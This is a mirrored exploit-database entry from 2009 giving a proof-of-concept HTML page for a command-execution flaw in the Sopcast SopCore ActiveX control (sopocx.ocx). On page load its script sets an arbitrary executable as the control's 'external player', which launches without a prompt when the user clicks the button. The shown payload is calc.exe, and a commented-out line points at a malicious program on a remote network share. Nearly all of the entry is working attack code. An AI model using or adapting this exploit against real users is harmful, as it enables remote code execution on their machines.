Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit

🗓️ 03 Mar 2009 00:00:00Reported by Nine:Situations:GroupType

zdt🔗 0day.today👁 26 Views

Sopcast SopCore Control Command Execution Exploi

==============================================================
Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit
==============================================================






<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
     user assisted remote code execution poc
     by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>



#  0day.today [2018-04-14]  #

03 Mar 2009 00:00Current

7.1High risk

Vulners AI Score7.1